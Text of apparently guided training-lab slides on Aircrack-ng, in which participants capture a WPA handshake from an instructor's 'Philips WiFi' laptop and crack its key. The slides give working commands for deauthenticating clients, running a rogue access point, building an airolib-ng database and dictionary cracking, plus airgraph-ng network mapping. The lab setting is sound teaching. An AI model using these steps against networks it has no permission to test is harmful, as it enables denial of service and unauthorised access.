Transcript 2_Guided - Aircrack-ng

Practical stuff
• Crack the WPA key of this laptop.
• SSID: « Philips WiFi »
• Password list and cowpatty table available
on CD (only useful today).
1
Practical stuff - Tips
• Make sure to disable all network managers and
other programs using wireless interfaces:
– airmon-ng check kill
• Madwifi-ng
– airmon-ng stop ath0
– airmon-ng start wifi0
• If you don’t see the handshake with aircrack-ng
(or any other tool), open your capture file with
wireshark and filter it with « eapol ».
2
Steps
1. Get the handshake
•
•
With the AP
Without the AP
2. Create airolib-ng database
3. Crack the handshake
3
Get the handshake – With AP
• Start airodump-ng to find the channel of the AP:
airodump-ng INTERFACE
• Make sure a client is connected. If there are none, you
won’t be able to get the handshake
• When you have the channel, stop the previous instance
(Ctrl-C) and start it again on the channel of the AP (and
save packets):
airodump-ng –c AP_CHANNEL –w philips-capture INTERFACE
• Open a new terminal and deauthenticate the client:
aireplay-ng –deauth 1 –a BSSID –c CLIENT_MAC INTERFACE
• If you didn’t get it, try again without specifying the client
MAC (some drivers prefer broadcast deauth):
aireplay-ng –deauth 1 –a BSSID INTERFACE
4
Get the handshake – Without AP
• Start airbase-ng
–
–
–
–
–
WPA-PSK (TKIP)
SSID: Philips WiFi
Do not answer to any other probe request
Channel 6
Save packets into philips-capture
airbase-ng -z 2 -W 1 -e “Philips WiFi” –y -c 6 –F
philips-capture rausb0
Notes:
• I’ll do this; Everybody doing it at once may not give the expected
result :)
• However, you can start airodump-ng on channel 6:
airodump-ng –c 6 –w philips-capture INTERFACE
• A bug in madwifi-ng prevent it from working correctly with airbase-ng
5
Creating airolib-ng database
• Since a cowpatty table already exist, we’ll
use it with airolib-ng:
– Output database: philips_airolib
– Import cowpatty file "Philips WiFi"
airolib-ng philips_airolib --import cowpatty
"Philips WiFi"
6
Crack the handshake
• Use aircrack-ng to crack the key:
– Capture file: philips-capture-01.cap
• Using airolib-ng database:
aircrack-ng –r philips_airolib philips-capture-01.cap
• Using a wordlist:
aircrack-ng –w passphrases.txt philips-capture-01.cap
7
Practical stuff - Airgraph-ng
• Creates a picture of the wireless networks
• Wardriver or just want to monitor your
network, this is for you.
8
Practical stuff - Airgraph-ng (2)
9
Practical Stuff – Aigraph-ng (3)
• Run airodump-ng with the parameters you
want (however -w is mandatory to make it
work).
• Airodump-ng writes the CSV file every 5
seconds.
• Whenever you want, start airgraph-ng on
the CSV file.
10
Practical stuff - Airgraph-ng (4)
• Parameters:
– Input file: Airodump-ng CSV file (.txt)
– Graph type:
• CAPR (Client – AP Relationship): Connected clients
• CPG (Common Probe Graph): Probed SSID
– Output file: Picture file name
• Examples:
– CAPR: airgraph-ng.py -i ../airgraph-01.txt -t
CAPR -o ../airgraph-capr.png
– CPG: airgraph-ng.py -i ../airgraph-01.txt -t
CPG -o ../airgraph-cpg.png
11